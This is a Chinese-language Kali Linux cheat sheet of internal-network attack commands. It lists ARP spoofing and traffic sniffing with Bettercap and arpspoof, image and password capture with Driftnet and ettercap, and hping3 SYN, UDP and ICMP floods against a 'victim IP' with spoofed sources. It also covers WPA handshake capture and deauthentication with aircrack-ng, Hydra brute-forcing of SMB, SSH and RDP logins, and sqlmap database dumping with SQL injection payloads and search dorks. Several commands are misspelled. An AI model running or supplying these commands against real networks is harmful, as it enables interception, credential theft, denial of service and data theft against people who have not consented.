使用之前请更新镜像源

内网工具集使用

Bettercap

Bettercap是一个功能强大的网络攻击工具,用于执行中间人攻击、ARP欺骗、DNS欺骗、SSL中间人攻击等。下面是使用Bettercap的基本步骤:

  1. 安装Bettercap:首先,您需要在Kali Linux上安装Bettercap。您可以使用以下命令进行安装:
sudo apt update
sudo apt install bettercap
  1. 启动Bettercap:安装完成后,您可以使用以下命令启动Bettercap:
sudo bettercap
  1. 选择接口:在Bettercap启动后,它将列出您系统上可用的网络接口。选择您要进行攻击的接口,例如Wi-Fi接口或以太网接口。

  2. 执行攻击:一旦选择了接口,您可以使用Bettercap的各种模块和命令执行不同的攻击。例如,您可以使用以下命令执行ARP欺骗攻击:

set arp.spoof.targets <目标IP>
arp.spoof on

这将启动ARP欺骗攻击,并将目标IP指定为您要攻击的目标。

  1. 监视流量:Bettercap还提供了监视网络流量的功能。您可以使用以下命令启动流量监视:
net.sniff on

捕获网卡中的http图片

Driftnet

Driftnet是一个用于捕获并展示网络中传输的图像的工具。它可以拦截网络流量中的图像文件,并将它们显示在屏幕上。以下是Driftnet的基本用法和一些常用参数:

  1. 基本用法:

    driftnet
    

    运行上述命令后,Driftnet将开始监听网络流量,并在屏幕上显示捕获到的图像。

  2. 指定捕获接口:

    driftnet -i eth0
    

    使用上述命令,您可以指定要监听的特定网络接口(例如eth0)。

  3. 指定图像保存目录:

    driftnet -d /path/to/directory
    

    使用上述命令,您可以指定Driftnet将捕获到的图像保存到指定的目录中。

  4. 显示图像尺寸信息:

    driftnet -s
    

    使用上述命令,Driftnet将在图像上显示其尺寸信息。

  5. 指定显示图像的窗口大小:

    driftnet -x width -y height
    

    使用上述命令,您可以指定Driftnet图像窗口的宽度和高度。

  6. 显示帮助信息:

    driftnet -h
    
  7. 捕获账号密码

    ettercap -Tq -i eth0
    

流量转发

开启流量转发

echo 1 > /proc/sys/net/ipv4/ip_forward

查看转发

cat /proc/sys/net/ipv4/ip_forward

arp欺骗

arping

"arping"是一个用于发送ARP请求的工具,用于检测网络中的主机是否在线。以下是"arping"的基本用法和一些常用参数:

  1. 基本用法:

    arping <目标IP地址>
    

    运行上述命令后,"arping"将发送ARP请求到指定的目标IP地址,并等待响应。

  2. 指定网络接口:

    arping -I <网络接口> <目标IP地址>
    

    使用上述命令,您可以指定要使用的网络接口。

  3. 指定源IP地址:

    arping -s <源IP地址> <目标IP地址>
    

    使用上述命令,您可以指定发送ARP请求时使用的源IP地址。

  4. 指定源MAC地址:

    arping -S <源MAC地址> <目标IP地址>
    

    使用上述命令,您可以指定发送ARP请求时使用的源MAC地址。

  5. 指定发送间隔时间:

    arping -w <发送间隔时间> <目标IP地址>
    

    使用上述命令,您可以指定发送ARP请求的间隔时间,以毫秒为单位。

  6. 显示详细信息:

    arping -v <目标IP地址>
    

    使用上述命令,"arping"将显示详细的输出信息,包括发送的ARP请求和接收到的响应。

  7. 显示帮助信息:

    arping -h
    

arpspoof

arpspoof是一个常用的网络工具,用于执行ARP欺骗攻击。它可以欺骗目标主机,使其将网络流量发送给攻击者,从而实现中间人攻击。以下是arpspoof的基本用法和一些常用参数:

  1. 基本用法:

    arpspoof -i <本地接口> -t <目标IP> <网关IP>
    

    运行上述命令后,arpspoof将开始欺骗目标主机,使其将网络流量发送给攻击者。其中,-i参数用于指定本地接口,-t参数用于指定目标主机的IP地址,<网关IP>是指网络中的网关IP地址。

  2. 指定双向欺骗:

    arpspoof -i <本地接口> -t <目标IP> -r <另一个目标IP> <网关IP>
    

    使用上述命令,arpspoof将同时欺骗两个目标主机,使其将网络流量发送给攻击者。

  3. 指定特定的本地MAC地址:

    arpspoof -i <本地接口> -t <目标IP> -m <本地MAC地址> <网关IP>
    

    使用上述命令,您可以指定要发送的ARP响应中使用的本地MAC地址。

  4. 显示详细信息:

    arpspoof -v -i <本地接口> -t <目标IP> <网关IP>
    

    使用上述命令,arpspoof将显示详细的输出信息,包括发送的ARP响应和捕获的流量。

  5. 指定静默模式:

    arpspoof -q -i <本地接口> -t <目标IP> <网关IP>
    

    使用上述命令,arpspoof将在静默模式下运行,不显示任何输出信息。

  6. 显示帮助信息:

    arpspoof -h
    

hping3以及压力测试

占满对方带宽不一定有效SYN攻击方式TCP

hping3 --flood -S --rand-source -p 端口 受害者IP

udp攻击无需对方建立连接不一定有效原理如上

hping3 --rand-source --udp -p 端口 --flood 受害者IP

icmp攻击方式但是最大数据只能1400

hping3 --flood --rand-source --icmp -d 1400 受害者ip

web测试压力 cc攻击模拟1000人并发

ab -n 数据数量 -c 并发多少人  网页链接

扫描类

收集域名信息

dig @dns

路由跟踪

traceroute

局域网ip扫描

netdiscover

WiFi类工具

aircrack-ng

开启监听模式

airmon-ng start wlan0

查看监听

airmon-ng

查看附近WiFi

airodump-ng wlan0mon

抓取握手包

airodump-ng -c 信道 --bssid 指定mac地址 -w 指定握手包保存位置 wlan0mon 

强制断开重新连接获取握手包

aireplay-ng -0 攻击次数 -a 设备BSSID  wlan0mon

开始跑包

aircarck-ng -a2 -b 目标设备BSSID -w 字典 /tmp/1
aireplay-ng -3 -b 目标BSSID -h 在链接的设备 wlan0mon desktop桌面

hydra九头蛇暴力破解密码类

l 指定单个用户名
-L指定单个用户名字典
-p指定单个密码
-P指定单个密码字典
-s 端口
-vV显示详细
-t 线程数默认16
-r 反向登录
-e nsr 参数
-n 没有密码的账户
-R 继续上一次破解
hybra -l administrator -P 密码字典目录 smb://目标ip -vV 
sshliunx远程服务22
rdp远程服务3389
smb文件共享445
mysql数据库3306

sql注入类

inurl:asp?=id=1
inurl:php?=id=1
sqlmap -u 网站url 找到注入点
sqlmap -u 网页链接 --dbs 扫描到几个数据
sqlmap -u url -D 数据库名 --tables 扫描表
sqlmap -u url -D 数据库name -T 表名 --columns 扫描字段
qlmap -u url -D 数据库name -T 表名 -C 列名 --dump 1
sqlmap -u url -D 数据库name -T 表名 -C content --dump 2
show databases 查看所有数据库
order by
and 1=2 union select 1, version() 查询数据库版本
use dvwa使用库
select database()查看默认库
show tables 查看所有表
desc 表 查看表结构
show create table users\G 查看创建表sql语句
select user() 查看当前默认用户
select * from users\G; 以字段的方式查看所有users表
select * from information_schema.TABLES\G
select * from information_schema.COLUMNS\G
TABLE_SCHEMA 数据库名
TABLE_NMAE 表名
COLUMN_NAME 列名
distinct 过滤
sqlmap --batch -u 地址?id=1